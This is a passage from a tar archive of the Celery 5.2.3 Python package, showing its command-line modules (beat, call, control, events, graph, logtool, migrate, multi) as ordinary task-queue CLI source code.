param.help_group: opts.setdefault(str(param.help_group), []).append(rv) else: opts.setdefault('Options', []).append(rv) for name, opts_group in opts.items(): with formatter.section(name): formatter.write_dl(opts_group) class CeleryDaemonCommand(CeleryCommand): """Daemon commands.""" def __init__(self, *args, **kwargs): """Initialize a Celery command with common daemon options.""" super().__init__(*args, **kwargs) self.params.append(CeleryOption(('-f', '--logfile'), help_group="Daemonization Options")) self.params.append(CeleryOption(('--pidfile',), help_group="Daemonization Options")) self.params.append(CeleryOption(('--uid',), help_group="Daemonization Options")) self.params.append(CeleryOption(('--uid',), help_group="Daemonization Options")) self.params.append(CeleryOption(('--gid',), help_group="Daemonization Options")) self.params.append(CeleryOption(('--umask',), help_group="Daemonization Options")) self.params.append(CeleryOption(('--executable',), help_group="Daemonization Options")) class CommaSeparatedList(ParamType): """Comma separated list argument.""" name = "comma separated list" def convert(self, value, param, ctx): return text.str_to_list(value) class JsonArray(ParamType): """JSON formatted array argument.""" name = "json array" def convert(self, value, param, ctx): if isinstance(value, list): return value try: v = json.loads(value) except ValueError as e: self.fail(str(e)) if not isinstance(v, list): self.fail(f"{value} was not an array") return v class JsonObject(ParamType): """JSON formatted object argument.""" name = "json object" def convert(self, value, param, ctx): if isinstance(value, dict): return value try: v = json.loads(value) except ValueError as e: self.fail(str(e)) if not isinstance(v, dict): self.fail(f"{value} was not an object") return v class ISO8601DateTime(ParamType): """ISO 8601 Date Time argument.""" name = "iso-86091" def convert(self, value, param, ctx): try: return maybe_iso8601(value) except (TypeError, ValueError) as e: self.fail(e) class ISO8601DateTimeOrFloat(ParamType): """ISO 8601 Date Time or float argument.""" name = "iso-86091 or float" def convert(self, value, param, ctx): try: return float(value) except (TypeError, ValueError): pass try: return maybe_iso8601(value) except (TypeError, ValueError) as e: self.fail(e) class LogLevel(click.Choice): """Log level option.""" def __init__(self): """Initialize the log level option with the relevant choices.""" super().__init__(('DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL', 'FATAL')) def convert(self, value, param, ctx): if isinstance(value, numbers.Integral): return value value = value.upper() value = super().convert(value, param, ctx) return mlevel(value) JSON_ARRAY = JsonArray() JSON_OBJECT = JsonObject() ISO8601 = ISO8601DateTime() ISO8601_OR_FLOAT = ISO8601DateTimeOrFloat() LOG_LEVEL = LogLevel() COMMA_SEPARATED_LIST = CommaSeparatedList() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/beat.py0000664000175000017500000000502700000000000016221 0ustar00asifasif00000000000000"""The :program:`celery beat` command.""" from functools import partial import click from celery.bin.base import (LOG_LEVEL, CeleryDaemonCommand, CeleryOption, handle_preload_options) from celery.platforms import detached, maybe_drop_privileges @click.command(cls=CeleryDaemonCommand, context_settings={ 'allow_extra_args': True }) @click.option('--detach', cls=CeleryOption, is_flag=True, default=False, help_group="Beat Options", help="Detach and run in the background as a daemon.") @click.option('-s', '--schedule', cls=CeleryOption, callback=lambda ctx, _, value: value or ctx.obj.app.conf.beat_schedule_filename, help_group="Beat Options", help="Path to the schedule database." " Defaults to `celerybeat-schedule`." "The extension '.db' may be appended to the filename.") @click.option('-S', '--scheduler', cls=CeleryOption, callback=lambda ctx, _, value: value or ctx.obj.app.conf.beat_scheduler, help_group="Beat Options", help="Scheduler class to use.") @click.option('--max-interval', cls=CeleryOption, type=int, help_group="Beat Options", help="Max seconds to sleep between schedule iterations.") @click.option('-l', '--loglevel', default='WARNING', cls=CeleryOption, type=LOG_LEVEL, help_group="Beat Options", help="Logging level.") @click.pass_context @handle_preload_options def beat(ctx, detach=False, logfile=None, pidfile=None, uid=None, gid=None, umask=None, workdir=None, **kwargs): """Start the beat periodic task scheduler.""" app = ctx.obj.app if ctx.args: try: app.config_from_cmdline(ctx.args) except (KeyError, ValueError) as e: # TODO: Improve the error messages raise click.UsageError("Unable to parse extra configuration" " from command line.\n" f"Reason: {e}", ctx=ctx) if not detach: maybe_drop_privileges(uid=uid, gid=gid) beat = partial(app.Beat, logfile=logfile, pidfile=pidfile, **kwargs) if detach: with detached(logfile, pidfile, uid, gid, umask, workdir): return beat().run() else: return beat().run() ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/call.py0000664000175000017500000000453700000000000016226 0ustar00asifasif00000000000000"""The ``celery call`` program used to send tasks from the command-line.""" import click from celery.bin.base import (ISO8601, ISO8601_OR_FLOAT, JSON_ARRAY, JSON_OBJECT, CeleryCommand, CeleryOption, handle_preload_options) @click.command(cls=CeleryCommand) @click.argument('name') @click.option('-a', '--args', cls=CeleryOption, type=JSON_ARRAY, default='[]', help_group="Calling Options", help="Positional arguments.") @click.option('-k', '--kwargs', cls=CeleryOption, type=JSON_OBJECT, default='{}', help_group="Calling Options", help="Keyword arguments.") @click.option('--eta', cls=CeleryOption, type=ISO8601, help_group="Calling Options", help="scheduled time.") @click.option('--countdown', cls=CeleryOption, type=float, help_group="Calling Options", help="eta in seconds from now.") @click.option('--expires', cls=CeleryOption, type=ISO8601_OR_FLOAT, help_group="Calling Options", help="expiry time.") @click.option('--serializer', cls=CeleryOption, default='json', help_group="Calling Options", help="task serializer.") @click.option('--queue', cls=CeleryOption, help_group="Routing Options", help="custom queue name.") @click.option('--exchange', cls=CeleryOption, help_group="Routing Options", help="custom exchange name.") @click.option('--routing-key', cls=CeleryOption, help_group="Routing Options", help="custom routing key.") @click.pass_context @handle_preload_options def call(ctx, name, args, kwargs, eta, countdown, expires, serializer, queue, exchange, routing_key): """Call a task by name.""" task_id = ctx.obj.app.send_task( name, args=args, kwargs=kwargs, countdown=countdown, serializer=serializer, queue=queue, exchange=exchange, routing_key=routing_key, eta=eta, expires=expires ).id ctx.obj.echo(task_id) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/celery.py0000664000175000017500000001503400000000000016570 0ustar00asifasif00000000000000"""Celery Command Line Interface.""" import os import pathlib import traceback import click import click.exceptions from click.types import ParamType from click_didyoumean import DYMGroup from click_plugins import with_plugins from pkg_resources import iter_entry_points from celery import VERSION_BANNER from celery.app.utils import find_app from celery.bin.amqp import amqp from celery.bin.base import CeleryCommand, CeleryOption, CLIContext from celery.bin.beat import beat from celery.bin.call import call from celery.bin.control import control, inspect, status from celery.bin.events import events from celery.bin.graph import graph from celery.bin.list import list_ from celery.bin.logtool import logtool from celery.bin.migrate import migrate from celery.bin.multi import multi from celery.bin.purge import purge from celery.bin.result import result from celery.bin.shell import shell from celery.bin.upgrade import upgrade from celery.bin.worker import worker UNABLE_TO_LOAD_APP_MODULE_NOT_FOUND = click.style(""" Unable to load celery application. The module {0} was not found.""", fg='red') UNABLE_TO_LOAD_APP_ERROR_OCCURRED = click.style(""" Unable to load celery application. While trying to load the module {0} the following error occurred: {1}""", fg='red') UNABLE_TO_LOAD_APP_APP_MISSING = click.style(""" Unable to load celery application. {0}""") class App(ParamType): """Application option.""" name = "application" def convert(self, value, param, ctx): try: return find_app(value) except ModuleNotFoundError as e: if e.name != value: exc = traceback.format_exc() self.fail( UNABLE_TO_LOAD_APP_ERROR_OCCURRED.format(value, exc) ) self.fail(UNABLE_TO_LOAD_APP_MODULE_NOT_FOUND.format(e.name)) except AttributeError as e: attribute_name = e.args[0].capitalize() self.fail(UNABLE_TO_LOAD_APP_APP_MISSING.format(attribute_name)) except Exception: exc = traceback.format_exc() self.fail( UNABLE_TO_LOAD_APP_ERROR_OCCURRED.format(value, exc) ) APP = App() @with_plugins(iter_entry_points('celery.commands')) @click.group(cls=DYMGroup, invoke_without_command=True) @click.option('-A', '--app', envvar='APP', cls=CeleryOption, type=APP, help_group="Global Options") @click.option('-b', '--broker', envvar='BROKER_URL', cls=CeleryOption, help_group="Global Options") @click.option('--result-backend', envvar='RESULT_BACKEND', cls=CeleryOption, help_group="Global Options") @click.option('--loader', envvar='LOADER', cls=CeleryOption, help_group="Global Options") @click.option('--config', envvar='CONFIG_MODULE', cls=CeleryOption, help_group="Global Options") @click.option('--workdir', cls=CeleryOption, type=pathlib.Path, callback=lambda _, __, wd: os.chdir(wd) if wd else None, is_eager=True, help_group="Global Options") @click.option('-C', '--no-color', envvar='NO_COLOR', is_flag=True, cls=CeleryOption, help_group="Global Options") @click.option('-q', '--quiet', is_flag=True, cls=CeleryOption, help_group="Global Options") @click.option('--version', cls=CeleryOption, is_flag=True, help_group="Global Options") @click.pass_context def celery(ctx, app, broker, result_backend, loader, config, workdir, no_color, quiet, version): """Celery command entrypoint.""" if version: click.echo(VERSION_BANNER) ctx.exit() elif ctx.invoked_subcommand is None: click.echo(ctx.get_help()) ctx.exit() if loader: # Default app takes loader from this env (Issue #1066). os.environ['CELERY_LOADER'] = loader if broker: os.environ['CELERY_BROKER_URL'] = broker if result_backend: os.environ['CELERY_RESULT_BACKEND'] = result_backend if config: os.environ['CELERY_CONFIG_MODULE'] = config ctx.obj = CLIContext(app=app, no_color=no_color, workdir=workdir, quiet=quiet) # User options worker.params.extend(ctx.obj.app.user_options.get('worker', [])) beat.params.extend(ctx.obj.app.user_options.get('beat', [])) events.params.extend(ctx.obj.app.user_options.get('events', [])) for command in celery.commands.values(): command.params.extend(ctx.obj.app.user_options.get('preload', [])) @celery.command(cls=CeleryCommand) @click.pass_context def report(ctx): """Shows information useful to include in bug-reports.""" app = ctx.obj.app app.loader.import_default_modules() ctx.obj.echo(app.bugreport()) celery.add_command(purge) celery.add_command(call) celery.add_command(beat) celery.add_command(list_) celery.add_command(result) celery.add_command(migrate) celery.add_command(status) celery.add_command(worker) celery.add_command(events) celery.add_command(inspect) celery.add_command(control) celery.add_command(graph) celery.add_command(upgrade) celery.add_command(logtool) celery.add_command(amqp) celery.add_command(shell) celery.add_command(multi) # Monkey-patch click to display a custom error # when -A or --app are used as sub-command options instead of as options # of the global command. previous_show_implementation = click.exceptions.NoSuchOption.show WRONG_APP_OPTION_USAGE_MESSAGE = """You are using `{option_name}` as an option of the {info_name} sub-command: celery {info_name} {option_name} celeryapp <...> The support for this usage was removed in Celery 5.0. Instead you should use `{option_name}` as a global option: celery {option_name} celeryapp {info_name} <...>""" def _show(self, file=None): if self.option_name in ('-A', '--app'): self.ctx.obj.error( WRONG_APP_OPTION_USAGE_MESSAGE.format( option_name=self.option_name, info_name=self.ctx.info_name), fg='red' ) previous_show_implementation(self, file=file) click.exceptions.NoSuchOption.show = _show def main() -> int: """Start celery umbrella command. This function is the main entrypoint for the CLI. :return: The exit code of the CLI. """ return celery(auto_envvar_prefix="CELERY") ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/control.py0000664000175000017500000001566100000000000016773 0ustar00asifasif00000000000000"""The ``celery control``, ``. inspect`` and ``. status`` programs.""" from functools import partial import click from kombu.utils.json import dumps from celery.bin.base import (COMMA_SEPARATED_LIST, CeleryCommand, CeleryOption, handle_preload_options) from celery.exceptions import CeleryCommandException from celery.platforms import EX_UNAVAILABLE from celery.utils import text from celery.worker.control import Panel def _say_remote_command_reply(ctx, replies, show_reply=False): node = next(iter(replies)) # <-- take first. reply = replies[node] node = ctx.obj.style(f'{node}: ', fg='cyan', bold=True) status, preply = ctx.obj.pretty(reply) ctx.obj.say_chat('->', f'{node}{status}', text.indent(preply, 4) if show_reply else '', show_body=show_reply) def _consume_arguments(meta, method, args): i = 0 try: for i, arg in enumerate(args): try: name, typ = meta.args[i] except IndexError: if meta.variadic: break raise click.UsageError( 'Command {!r} takes arguments: {}'.format( method, meta.signature)) else: yield name, typ(arg) if typ is not None else arg finally: args[:] = args[i:] def _compile_arguments(action, args): meta = Panel.meta[action] arguments = {} if meta.args: arguments.update({ k: v for k, v in _consume_arguments(meta, action, args) }) if meta.variadic: arguments.update({meta.variadic: args}) return arguments @click.command(cls=CeleryCommand) @click.option('-t', '--timeout', cls=CeleryOption, type=float, default=1.0, help_group='Remote Control Options', help='Timeout in seconds waiting for reply.') @click.option('-d', '--destination', cls=CeleryOption, type=COMMA_SEPARATED_LIST, help_group='Remote Control Options', help='Comma separated list of destination node names.') @click.option('-j', '--json', cls=CeleryOption, is_flag=True, help_group='Remote Control Options', help='Use json as output format.') @click.pass_context @handle_preload_options def status(ctx, timeout, destination, json, **kwargs): """Show list of workers that are online.""" callback = None if json else partial(_say_remote_command_reply, ctx) replies = ctx.obj.app.control.inspect(timeout=timeout, destination=destination, callback=callback).ping() if not replies: raise CeleryCommandException( message='No nodes replied within time constraint', exit_code=EX_UNAVAILABLE ) if json: ctx.obj.echo(dumps(replies)) nodecount = len(replies) if not kwargs.get('quiet', False): ctx.obj.echo('\n{} {} online.'.format( nodecount, text.pluralize(nodecount, 'node'))) @click.command(cls=CeleryCommand, context_settings={'allow_extra_args': True}) @click.argument("action", type=click.Choice([ name for name, info in Panel.meta.items() if info.type == 'inspect' and info.visible ])) @click.option('-t', '--timeout', cls=CeleryOption, type=float, default=1.0, help_group='Remote Control Options', help='Timeout in seconds waiting for reply.') @click.option('-d', '--destination', cls=CeleryOption, type=COMMA_SEPARATED_LIST, help_group='Remote Control Options', help='Comma separated list of destination node names.') @click.option('-j', '--json', cls=CeleryOption, is_flag=True, help_group='Remote Control Options', help='Use json as output format.') @click.pass_context @handle_preload_options def inspect(ctx, action, timeout, destination, json, **kwargs): """Inspect the worker at runtime. Availability: RabbitMQ (AMQP) and Redis transports. """ callback = None if json else partial(_say_remote_command_reply, ctx, show_reply=True) arguments = _compile_arguments(action, ctx.args) inspect = ctx.obj.app.control.inspect(timeout=timeout, destination=destination, callback=callback) replies = inspect._request(action, **arguments) if not replies: raise CeleryCommandException( message='No nodes replied within time constraint', exit_code=EX_UNAVAILABLE ) if json: ctx.obj.echo(dumps(replies)) return nodecount = len(replies) if not ctx.obj.quiet: ctx.obj.echo('\n{} {} online.'.format( nodecount, text.pluralize(nodecount, 'node'))) @click.command(cls=CeleryCommand, context_settings={'allow_extra_args': True}) @click.argument("action", type=click.Choice([ name for name, info in Panel.meta.items() if info.type == 'control' and info.visible ])) @click.option('-t', '--timeout', cls=CeleryOption, type=float, default=1.0, help_group='Remote Control Options', help='Timeout in seconds waiting for reply.') @click.option('-d', '--destination', cls=CeleryOption, type=COMMA_SEPARATED_LIST, help_group='Remote Control Options', help='Comma separated list of destination node names.') @click.option('-j', '--json', cls=CeleryOption, is_flag=True, help_group='Remote Control Options', help='Use json as output format.') @click.pass_context @handle_preload_options def control(ctx, action, timeout, destination, json): """Workers remote control. Availability: RabbitMQ (AMQP), Redis, and MongoDB transports. """ callback = None if json else partial(_say_remote_command_reply, ctx, show_reply=True) args = ctx.args arguments = _compile_arguments(action, args) replies = ctx.obj.app.control.broadcast(action, timeout=timeout, destination=destination, callback=callback, reply=True, arguments=arguments) if not replies: raise CeleryCommandException( message='No nodes replied within time constraint', exit_code=EX_UNAVAILABLE ) if json: ctx.obj.echo(dumps(replies)) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/events.py0000664000175000017500000000541100000000000016607 0ustar00asifasif00000000000000"""The ``celery events`` program.""" import sys from functools import partial import click from celery.bin.base import (LOG_LEVEL, CeleryDaemonCommand, CeleryOption, handle_preload_options) from celery.platforms import detached, set_process_title, strargv def _set_process_status(prog, info=''): prog = '{}:{}'.format('celery events', prog) info = f'{info} {strargv(sys.argv)}' return set_process_title(prog, info=info) def _run_evdump(app): from celery.events.dumper import evdump _set_process_status('dump') return evdump(app=app) def _run_evcam(camera, app, logfile=None, pidfile=None, uid=None, gid=None, umask=None, workdir=None, detach=False, **kwargs): from celery.events.snapshot import evcam _set_process_status('cam') kwargs['app'] = app cam = partial(evcam, camera, logfile=logfile, pidfile=pidfile, **kwargs) if detach: with detached(logfile, pidfile, uid, gid, umask, workdir): return cam() else: return cam() def _run_evtop(app): try: from celery.events.cursesmon import evtop _set_process_status('top') return evtop(app=app) except ModuleNotFoundError as e: if e.name == '_curses': # TODO: Improve this error message raise click.UsageError("The curses module is required for this command.") @click.command(cls=CeleryDaemonCommand) @click.option('-d', '--dump', cls=CeleryOption, is_flag=True, help_group='Dumper') @click.option('-c', '--camera', cls=CeleryOption, help_group='Snapshot') @click.option('-d', '--detach', cls=CeleryOption, is_flag=True, help_group='Snapshot') @click.option('-F', '--frequency', '--freq', type=float, default=1.0, cls=CeleryOption, help_group='Snapshot') @click.option('-r', '--maxrate', cls=CeleryOption, help_group='Snapshot') @click.option('-l', '--loglevel', default='WARNING', cls=CeleryOption, type=LOG_LEVEL, help_group="Snapshot", help="Logging level.") @click.pass_context @handle_preload_options def events(ctx, dump, camera, detach, frequency, maxrate, loglevel, **kwargs): """Event-stream utilities.""" app = ctx.obj.app if dump: return _run_evdump(app) if camera: return _run_evcam(camera, app=app, freq=frequency, maxrate=maxrate, loglevel=loglevel, detach=detach, **kwargs) return _run_evtop(app) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/graph.py0000664000175000017500000001324400000000000016407 0ustar00asifasif00000000000000"""The ``celery graph`` command.""" import sys from operator import itemgetter import click from celery.bin.base import CeleryCommand, handle_preload_options from celery.utils.graph import DependencyGraph, GraphFormatter @click.group() @click.pass_context @handle_preload_options def graph(ctx): """The ``celery graph`` command.""" @graph.command(cls=CeleryCommand, context_settings={'allow_extra_args': True}) @click.pass_context def bootsteps(ctx): """Display bootsteps graph.""" worker = ctx.obj.app.WorkController() include = {arg.lower() for arg in ctx.args or ['worker', 'consumer']} if 'worker' in include: worker_graph = worker.blueprint.graph if 'consumer' in include: worker.blueprint.connect_with(worker.consumer.blueprint) else: worker_graph = worker.consumer.blueprint.graph worker_graph.to_dot(sys.stdout) @graph.command(cls=CeleryCommand, context_settings={'allow_extra_args': True}) @click.pass_context def workers(ctx): """Display workers graph.""" def simplearg(arg): return maybe_list(itemgetter(0, 2)(arg.partition(':'))) def maybe_list(l, sep=','): return l[0], l[1].split(sep) if sep in l[1] else l[1] args = dict(simplearg(arg) for arg in ctx.args) generic = 'generic' in args def generic_label(node): return '{} ({}://)'.format(type(node).__name__, node._label.split('://')[0]) class Node: force_label = None scheme = {} def __init__(self, label, pos=None): self._label = label self.pos = pos def label(self): return self._label def __str__(self): return self.label() class Thread(Node): scheme = { 'fillcolor': 'lightcyan4', 'fontcolor': 'yellow', 'shape': 'oval', 'fontsize': 10, 'width': 0.3, 'color': 'black', } def __init__(self, label, **kwargs): self.real_label = label super().__init__( label=f'thr-{next(tids)}', pos=0, ) class Formatter(GraphFormatter): def label(self, obj): return obj and obj.label() def node(self, obj): scheme = dict(obj.scheme) if obj.pos else obj.scheme if isinstance(obj, Thread): scheme['label'] = obj.real_label return self.draw_node( obj, dict(self.node_scheme, **scheme), ) def terminal_node(self, obj): return self.draw_node( obj, dict(self.term_scheme, **obj.scheme), ) def edge(self, a, b, **attrs): if isinstance(a, Thread): attrs.update(arrowhead='none', arrowtail='tee') return self.draw_edge(a, b, self.edge_scheme, attrs) def subscript(n): S = {'0': '₀', '1': '₁', '2': '₂', '3': '₃', '4': '₄', '5': '₅', '6': '₆', '7': '₇', '8': '₈', '9': '₉'} return ''.join([S[i] for i in str(n)]) class Worker(Node): pass class Backend(Node): scheme = { 'shape': 'folder', 'width': 2, 'height': 1, 'color': 'black', 'fillcolor': 'peachpuff3', } def label(self): return generic_label(self) if generic else self._label class Broker(Node): scheme = { 'shape': 'circle', 'fillcolor': 'cadetblue3', 'color': 'cadetblue4', 'height': 1, } def label(self): return generic_label(self) if generic else self._label from itertools import count tids = count(1) Wmax = int(args.get('wmax', 4) or 0) Tmax = int(args.get('tmax', 3) or 0) def maybe_abbr(l, name, max=Wmax): size = len(l) abbr = max and size > max if 'enumerate' in args: l = [f'{name}{subscript(i + 1)}' for i, obj in enumerate(l)] if abbr: l = l[0:max - 1] + [l[size - 1]] l[max - 2] = '{}⎨…{}⎬'.format( name[0], subscript(size - (max - 1))) return l app = ctx.obj.app try: workers = args['nodes'] threads = args.get('threads') or [] except KeyError: replies = app.control.inspect().stats() or {} workers, threads = [], [] for worker, reply in replies.items(): workers.append(worker) threads.append(reply['pool']['max-concurrency']) wlen = len(workers) backend = args.get('backend', app.conf.result_backend) threads_for = {} workers = maybe_abbr(workers, 'Worker') if Wmax and wlen > Wmax: threads = threads[0:3] + [threads[-1]] for i, threads in enumerate(threads): threads_for[workers[i]] = maybe_abbr( list(range(int(threads))), 'P', Tmax, ) broker = Broker(args.get( 'broker', app.connection_for_read().as_uri())) backend = Backend(backend) if backend else None deps = DependencyGraph(formatter=Formatter()) deps.add_arc(broker) if backend: deps.add_arc(backend) curworker = [0] for i, worker in enumerate(workers): worker = Worker(worker, pos=i) deps.add_arc(worker) deps.add_edge(worker, broker) if backend: deps.add_edge(worker, backend) threads = threads_for.get(worker._label) if threads: for thread in threads: thread = Thread(thread) deps.add_arc(thread) deps.add_edge(thread, worker) curworker[0] += 1 deps.to_dot(sys.stdout) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/list.py0000664000175000017500000000204200000000000016253 0ustar00asifasif00000000000000"""The ``celery list bindings`` command, used to inspect queue bindings.""" import click from celery.bin.base import CeleryCommand, handle_preload_options @click.group(name="list") @click.pass_context @handle_preload_options def list_(ctx): """Get info from broker. Note: For RabbitMQ the management plugin is required. """ @list_.command(cls=CeleryCommand) @click.pass_context def bindings(ctx): """Inspect queue bindings.""" # TODO: Consider using a table formatter for this command. app = ctx.obj.app with app.connection() as conn: app.amqp.TaskConsumer(conn).declare() try: bindings = conn.manager.get_bindings() except NotImplementedError: raise click.UsageError('Your transport cannot list bindings.') def fmt(q, e, r): ctx.obj.echo(f'{q:<28} {e:<28} {r}') fmt('Queue', 'Exchange', 'Routing Key') fmt('-' * 16, '-' * 16, '-' * 16) for b in bindings: fmt(b['destination'], b['source'], b['routing_key']) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/logtool.py0000664000175000017500000001025300000000000016762 0ustar00asifasif00000000000000"""The ``celery logtool`` command.""" import re from collections import Counter from fileinput import FileInput import click from celery.bin.base import CeleryCommand, handle_preload_options __all__ = ('logtool',) RE_LOG_START = re.compile(r'^\[\d\d\d\d\-\d\d-\d\d ') RE_TASK_RECEIVED = re.compile(r'.+?\] Received') RE_TASK_READY = re.compile(r'.+?\] Task') RE_TASK_INFO = re.compile(r'.+?([\w\.]+)\[(.+?)\].+') RE_TASK_RESULT = re.compile(r'.+?[\w\.]+\[.+?\] (.+)') REPORT_FORMAT = """ Report ====== Task total: {task[total]} Task errors: {task[errors]} Task success: {task[succeeded]} Task completed: {task[completed]} Tasks ===== {task[types].format} """ class _task_counts(list): @property def format(self): return '\n'.join('{}: {}'.format(*i) for i in self) def task_info(line): m = RE_TASK_INFO.match(line) return m.groups() class Audit: def __init__(self, on_task_error=None, on_trace=None, on_debug=None): self.ids = set() self.names = {} self.results = {} self.ready = set() self.task_types = Counter() self.task_errors = 0 self.on_task_error = on_task_error self.on_trace = on_trace self.on_debug = on_debug self.prev_line = None def run(self, files): for line in FileInput(files): self.feed(line) return self def task_received(self, line, task_name, task_id): self.names[task_id] = task_name self.ids.add(task_id) self.task_types[task_name] += 1 def task_ready(self, line, task_name, task_id, result): self.ready.add(task_id) self.results[task_id] = result if 'succeeded' not in result: self.task_error(line, task_name, task_id, result) def task_error(self, line, task_name, task_id, result): self.task_errors += 1 if self.on_task_error: self.on_task_error(line, task_name, task_id, result) def feed(self, line): if RE_LOG_START.match(line): if RE_TASK_RECEIVED.match(line): task_name, task_id = task_info(line) self.task_received(line, task_name, task_id) elif RE_TASK_READY.match(line): task_name, task_id = task_info(line) result = RE_TASK_RESULT.match(line) if result: result, = result.groups() self.task_ready(line, task_name, task_id, result) else: if self.on_debug: self.on_debug(line) self.prev_line = line else: if self.on_trace: self.on_trace('\n'.join(filter(None, [self.prev_line, line]))) self.prev_line = None def incomplete_tasks(self): return self.ids ^ self.ready def report(self): return { 'task': { 'types': _task_counts(self.task_types.most_common()), 'total': len(self.ids), 'errors': self.task_errors, 'completed': len(self.ready), 'succeeded': len(self.ready) - self.task_errors, } } @click.group() @click.pass_context @handle_preload_options def logtool(ctx): """The ``celery logtool`` command.""" @logtool.command(cls=CeleryCommand) @click.argument('files', nargs=-1) @click.pass_context def stats(ctx, files): ctx.obj.echo(REPORT_FORMAT.format( **Audit().run(files).report() )) @logtool.command(cls=CeleryCommand) @click.argument('files', nargs=-1) @click.pass_context def traces(ctx, files): Audit(on_trace=ctx.obj.echo).run(files) @logtool.command(cls=CeleryCommand) @click.argument('files', nargs=-1) @click.pass_context def errors(ctx, files): Audit(on_task_error=lambda line, *_: ctx.obj.echo(line)).run(files) @logtool.command(cls=CeleryCommand) @click.argument('files', nargs=-1) @click.pass_context def incomplete(ctx, files): audit = Audit() audit.run(files) for task_id in audit.incomplete_tasks(): ctx.obj.echo(f'Did not complete: {task_id}') @logtool.command(cls=CeleryCommand) @click.argument('files', nargs=-1) @click.pass_context def debug(ctx, files): Audit(on_debug=ctx.obj.echo).run(files) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/migrate.py0000664000175000017500000000413300000000000016733 0ustar00asifasif00000000000000"""The ``celery migrate`` command, used to filter and move messages.""" import click from kombu import Connection from celery.bin.base import (CeleryCommand, CeleryOption, handle_preload_options) from celery.contrib.migrate import migrate_tasks @click.command(cls=CeleryCommand) @click.argument('source') @click.argument('destination') @click.option('-n', '--limit', cls=CeleryOption, type=int, help_group='Migration Options', help='Number of tasks to consume.') @click.option('-t', '--timeout', cls=CeleryOption, type=float, help_group='Migration Options', help='Timeout in seconds waiting for tasks.') @click.option('-a', '--ack-messages', cls=CeleryOption, is_flag=True, help_group='Migration Options', help='Ack messages from source broker.') @click.option('-T', '--tasks', cls=CeleryOption, help_group='Migration Options', help='List of task names to filter on.') @click.option('-Q', '--queues', cls=CeleryOption, help_group='Migration Options', help='List of queues to migrate.') @click.option('-F', '--forever', cls=CeleryOption, is_flag=True, help_group='Migration Options', help='Continually migrate tasks until killed.') @click.pass_context @handle_preload_options def migrate(ctx, source, destination, **kwargs): """Migrate tasks from one broker to another. Warning: This command is experimental, make sure you have a backup of the tasks before you continue. """ # TODO: Use a progress bar def on_migrate_task(state, body, message): ctx.obj.echo(f"Migrating task {state.count}/{state.strtotal}: {body}") migrate_tasks(Connection(source), Connection(destination), callback=on_migrate_task, **kwargs) ././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/celery/bin/multi.py0000664000175000017500000003600400000000000016437 0ustar00asifasif00000000000000"""Start multiple worker instances from the command-line. .. program:: celery multi Examples ======== .. code-block:: console $ # Single worker with explicit name and events enabled. $ celery multi start Leslie -E $ # Pidfiles and logfiles are stored in the current directory $ # by default. Use --pidfile and --logfile argument to change $ # this. The abbreviation %n will be expanded to the current $ # node name. $ celery multi start Leslie -E --pidfile=/var/run/celery/%n.pid --logfile=/var/log/celery/%n%I.log $ # You need to add the same arguments when you restart, $ # as these aren't persisted anywhere. $ celery multi restart Leslie -E --pidfile=/var/run/celery/%n.pid --logfile=/var/log/celery/%n%I.log $ # To stop the node, you need to specify the same pidfile. $ celery multi stop Leslie --pidfile=/var/run/celery/%n.pid $ # 3 workers, with 3 processes each $ celery multi start 3 -c 3 celery worker -n celery1@myhost -c 3 celery worker -n celery2@myhost -c 3 celery worker -n celery3@myhost -c 3 $ # override name prefix when using range $ celery multi start 3 --range-prefix=worker -c 3 celery worker -n worker1@myhost -c 3 celery worker -n worker2@myhost -c 3 celery worker -n worker3@myhost -c 3 $ # start 3 named workers $ celery multi start image video data -c 3 celery worker -n image@myhost -c 3 celery worker -n video@myhost -c 3 celery worker -n data@myhost -c 3 $ # specify custom hostname $ celery multi start 2 --hostname=worker.example.com -c 3 celery worker -n celery1@worker.example.com -c 3 celery worker -n celery2@worker.example.com -c 3 $ # specify fully qualified nodenames $ celery multi start foo@worker.example.com bar@worker.example.com -c 3 $ # fully qualified nodenames but using the current hostname $ celery multi start foo@%h bar@%h $ # Advanced example starting 10 workers in the background: $ # * Three of the workers processes the images and video queue $ # * Two of the workers processes the data queue with loglevel DEBUG $ # * the rest processes the default' queue. $ celery multi start 10 -l INFO -Q:1-3 images,video -Q:4,5 data -Q default -L:4,5 DEBUG $ # You can show the commands necessary to start the workers with $ # the 'show' command: $ celery multi show 10 -l INFO -Q:1-3 images,video -Q:4,5 data -Q default -L:4,5 DEBUG $ # Additional options are added to each celery worker's command, $ # but you can also modify the options for ranges of, or specific workers $ # 3 workers: Two with 3 processes, and one with 10 processes. $ celery multi start 3 -c 3 -c:1 10 celery worker -n celery1@myhost -c 10 celery worker -n celery2@myhost -c 3 celery worker -n celery3@myhost -c 3 $ # can also specify options for named workers $ celery multi start image video data -c 3 -c:image 10 celery worker -n image@myhost -c 10 celery worker -n video@myhost -c 3 celery worker -n data@myhost -c 3 $ # ranges and lists of workers in options is also allowed: $ # (-c:1-3 can also be written as -c:1,2,3) $ celery multi start 5 -c 3 -c:1-3 10 celery worker -n celery1@myhost -c 10 celery worker -n celery2@myhost -c 10 celery worker -n celery3@myhost -c 10 celery worker -n celery4@myhost -c 3 celery worker -n celery5@myhost -c 3 $ # lists also works with named workers $ celery multi start foo bar baz xuzzy -c 3 -c:foo,bar,baz 10 celery worker -n foo@myhost -c 10 celery worker -n bar@myhost -c 10 celery worker -n baz@myhost -c 10 celery worker -n xuzzy@myhost 